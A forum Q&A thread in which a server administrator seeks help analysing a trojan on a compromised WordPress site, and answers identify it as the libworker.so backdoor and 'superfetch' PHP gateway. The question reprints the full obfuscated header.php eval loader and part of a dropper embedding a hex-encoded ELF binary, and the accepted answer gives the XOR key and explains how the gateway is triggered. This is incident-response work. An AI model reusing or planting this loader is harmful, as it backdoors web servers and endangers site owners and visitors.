# Wordpress infected with Trojan

Tags: php, wordpress, centos

So recently our (VPS CentOS6.5) server began hosting a WP site that was, or became, infected (via revslider plugin) with some kind of trojan (probably spam sender, as we ended up on Spamhaus list very quickly)

The core (we think) is a nice little file called `system.php`
http://pastebin.com/1Uyipejn

Which seems to be triggered by an infected WP header `header.php` http://pastebin.com/9m2cikpG

It managed to create 4 cron jobs, and we are very interested as to what it was doing. How can I find out?

**Edit:**
here is `header.php`

```
<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(`(`-^(:(`(`+`(^+_(-(:(`(.+{(_+_(-(_+`+_(-)](^(.(,({(:+`(:+|(,)](:({(]+`(:)](:(`(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+`(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`+{(],&(:)](:(`(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&(`+`(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-(`(](:(`(^(:+`(,+{(:,&(]+`(.(](:)]+_(--_(_(^(^(:(,+`(,-^(:+_(-(_(:(]+`(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^(`(.(:({(,)](.(`(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(`,&(`(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-(`(,({(`(.(:+_(-(,-_(:-_+_(-+`(.-_(.(]+_(-({(]-_(^(,(,(`(,(^(:+_(-(.,&(,(:(:+|(,(](_+`(.-^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^(`(_(,(.(,+`(.+_(-(.+`+_(--^(:+{+_(-({(:-_(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.(`(,-_(.(`(`-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+`(]-_(:+_(-(`(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+`(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+`(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.(`(.(,,&(`({(`(_(,(.(,(](.(.(:+|(,(](`+{(]-^(.)](`+`(]+|(:(`+_(-+_(-(^+{(](.(`+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(](`(_+_(-(](,-^(:,&(:-_(](.(`(`(,+|(_(:(`-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)](`-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+`(`(.(,(](`-^(]+{(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,(`(_(:(_(^+_(-(:+`(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_(`-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+`(:(:(,(^(_,&+_(-(.+_(-+_(-(](`(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_(`+{(^(`(,(,+_(-)](:(:(.(,(](.(`(]+_(-+`(.(:(.(_(,-^(_(.+_(-+`(^(^+_(-)](`(^(`(,(](_(_(.(^(`(`(](:(`+_(-)](:(`(^(`(,+{(](:(`(^(.)](,(:(.(:(,-_(_,&(`+`(]+|(:(.+_(-+_(-(^+{(](`(_(,(_(](^(](:(.+_(-({(:({(:(`+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&(`-_(],&(:,&(`+_(-(](.(_+|+_(-+`(^(_(,,&(`+{(`(,(](:(.({(.+`(.+|(:(^(,(`(.+`(](^+_(-(`(](:(`(_(:-_(:+_(-(_(:(:(`(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^(`+`(`({(.+`(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+`(,-_(`(,(](:(.({(]-^(.(^(`({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+`(](.(`(`(,+|+_(-+_(-(_(`(:(_(_+|(,,&(,-_(.+{(:(](:+`(,(_(:+|+_(-)](.-_(`-^(]-_(.(:(_,&(](:(:(_(`+{(_(.(.+`(.(:+_(-({(.(^(:(^(:(](.(_(^+`+_(-,&+_(-({(:(`(`+_(-(]-^(.(:(](:(`+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{(`(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(`)]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](`,&(,(^(_({(.+`(.-_(.-^(,-^(.(_+_(--^(^(_(,({(`-^(`,&(,(^(`+`(^+_(-(.-_(:(^(,(:(.+`+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_(`-^(])]+_(-)](^({(^(,(](`(`(_(:(_(](:(_({+_(-(`(](,(`)](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.(`(]+`(.+|(:(:+_(--_(.(_(^-^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(](`(`(_(.)](](_(`(`+_(-({(_(_(`(.(,(`(_+|(:+|(,)](_+_(-(^+{(:(,(,+|(`+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+`(:(_(,(](_(.(`(.(,+`(_)]+_(-(.(,(.(](.(`+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+`(.-_(:({(](:(_+_(-(^+`(^-^(])](.(^(:+{(]({(`+`(](:(](,(^-_(_(.(:-^(:+|(`+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(](`(`(,+_(--^(.-_(,(`(]+`(_({(`({(]-_(:(`+_(-({(^(,(]+{+_(-+`(,,&(:-^(,(:(](^(`+{(`({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_(`+{+_(-+|(:+`(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:(`(_(.+`(](:(`+`(_(,(](:(^-_(_(.(:-^(:+|(`+{(_(.(^+{(^(,(]-^(:+_(-(^(`(,+`(:(,+_(-)](.(,(^(`+_(-(_(](:(`(_(.+`(](_(_+{(^+{(`(:(_(](](.(`-^(:+|(`+{(_(.(^+{(^(,(.+`(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&(`-^(`,&(,({(`+`(^+_(-(](,(^-_(_(.(]+|(]+{(`({(_(.(^+{(^(,(.+`(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&(`+{(_(.(_(,(^+`(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({(`+_(-(^+|(_(.(]+|(]+{(`({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:(`(^+|(](](_+`(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+`(:(:+_(-(:(.(,(^(^(`({(,,&(.(`(:(`(,)](.(`(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+`(,(:(.+|(`-^(]-_(.(_(,+{(]-_(^(_(`(,(.-^(,(.(:+`(,)](.(.(`(_+_(-({(:(,(](_+_(-(`+_(-)](:(](:+|+_(--^(:(,(,(.(_+`(_(`(^(^(_(^+_(-)]+_(-(_(,-^(.(](`(_(,(](.(_(,(_(.(_(`(_(^)](`+{+_(-(_(^,&(,-_(:(`(.-_(](^(:,&+_(--_(.(_(:+`(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^(`(:(.(^(,+_(-(`(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^(`(_(])](,+`(`,&(.-^(,(^(`(,(_(.(_(,(^+`+_(-(`(](,(^-_(,-^(.)](](^+_(-(`(,(.(:(](`+_(-(.+`(.(,+_(--^(:({(.(^+_(--_(:(`+_(--^(^(_(,({(`-^(`+{+_(-)](.(_+_(-+`(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:(`(,(`(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&(`+`+_(-)](,-_(:-^+_(-+`(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](`,&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-(`(^)](,(:(.+|(`-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+`(,)]+_(-(^(.(`+_(--^(.+`(](.+_(-(`+_(-({(,,&(:-^+_(-+`(:(,(](.(_(:(`-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:(`+_(-({(.,&(^(:(,+_(-(](:(`(_(:+`(](:(_({+_(-(`(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)](`-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)`(-(-)^*&,|-(,*(.(*,++^(*,|+`(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+`+`)`(*,|)^-`,+,_-),+-^(*,*({)`*&,),.-((.(.(*,.+^(*,++^(*,|+`+`)_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+`+`(:(:)^-`-`,:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)`(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)`(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)`(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-`(*,^)`(*+|*)*|*|*^*:*++^(-,^,+-:(-+`)^,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|+&*|+)+*+^(-,^,+-:(-+`)^-`,:,,(.,+,`-&-*-:(.(*,^(:(:-^(*,^)`(*+|*-*++*+^(-,^,+-:(-+`)^-`,:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-`(*,+,_)`*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)`*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>
```

and here is a portion of the commands & encoding used in `system.php`
(too large to post here in full, see the pastebin)

```
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x20\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03
```

Does anybody recognize the encoding type, so I may decode and investigate further myself?

**Edit 2:**
worked out that `system.php` uses hex encoding (decoded http://pastebin.com/UtKLMN85)
TL;DR it's an `ELF` - is there a way to find out what it does, beside running it on a test box?

Comment: You should definitely take the server offline if you haven't already.

Comment: the infection has been cleaned, and offending processes terminated - everything seems to be running normally again. Still very interested as to what they were doing with the cronjobs (probably just spam botnet stuff, but need to be sure)

Comment: You didn't wipe the computer? I think that is the standard response after such infections.

Comment: it's a VPS that is hosting dozens of production sites, "wiping the computer" doesn't cut it just yet..

Comment: This is definitely a justification you can take to the relevant parties about only hosting at most one production site per VPS.

Comment: Indeed, I have already mentioned that at every opportunity since it happened..

Comment: Doesn't this just kill everything? Or no?

Comment: run "strings" on the generated ELF-binary and send a pastebin-link here

Comment: soon, i will be following up all the suggestions and comments so far mentioned, hopefully with a positive result for all :)

Answer (score 4, accepted):

I think you're the proud owner of a "libworker.so" backdoor! Malware Must Die has [a good analysis](http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html) of it, read that before running it yourself. The Malware Must Die author isn't a native english speaker, but does disclose a ton of detail.

Malware Must Die has the PHP "dropper" code getting downloaded via a copy of "Web Shell by oRb", so you're going to need to go over the hacked WordPress site with a fine-tooth comb.  I'd grep for "eval(" in every file as a start.

The 2nd paste (`header.php`) looks like maybe a gateway program. There's a couple of levels of obfuscation hiding a program that includes an encrypted chunk of code, and a decryption program that bitwise-exclusive-ors the key against the encrypted chunk, and then eval's the decrypted code. Since the `header.php` file is carrying the encrypted code, and the key string comes in on an HTTP request, that code probably contains a hostname or IP address or something that would let you trace the source. I'll hazard a guess that the encrypted code is some kind of file gateway. That is, someone calls your web server with the `header.php` URL, and a special cookie, or some GET or POST parameters, along with a file name. The decrypted code fetches the file from somewhere, and passes it on to the `header.php` caller. That's just a guess, however.

You might be able to recover the encryption key if someone called `header.php` as an HTTP GET, with a `key=blahblah` parameter. Might be worth a look in `access_log` to be sure.

**UPDATE:**

The `header.php` encrypted text can be recovered with a key string of "SjJVkE6rkRYj", 12 ACII letters, no quotes. I finally recognized the decrypter routine, and googled for that. Hacker News has a [nice explanation](https://news.ycombinator.com/item?id=6875121) of how to get an Xor encryption key string. There's an [even older Hacker News comment string](https://news.ycombinator.com/item?id=3432800) about the same key/script, and that leads to a [paste of the same code](http://pastebin.com/z53aByWX) I get when I decrypt your `header.php` encrypted text.  It's the ["superfetch" PHP malware](https://blog.sucuri.net/2013/12/how-we-decoded-some-nasty-multi-level-encoded-malware.html), and while it is a file gateway, as I predicted above, it doesn't contain IP addresses or host names. Instead, the gateway code uses a URL that arrives in a GET or POST with the parameter named "SjJVkE6rkRYj", or in a cookie that has the same parameter. That's clever, but only obscured, not secured.

Comment: that post from MMD is huge, and a long way down I found exact copies of the files we had in the WP site - TL:DR if you have a `.sd0` file, you're infected.

Answer (score 1):

Have you looked in /var/spool/cron and /etc/crontab or any other CRON subdirectory inside of /var or /etc? Perhaps you could see any cron jobs scheduled here.

If you've already determined the ELF file was part of the infection, to answer the last part of your question, I would only run it in a sandboxed environment if you want to get a true view of what it does. Hope this helps.

Comment: yes, we deleted the crons immediately

Answer (score -1):

The shellcode's encoding is basic hex referencing. The ELF is likely related to the Ramnit botnet.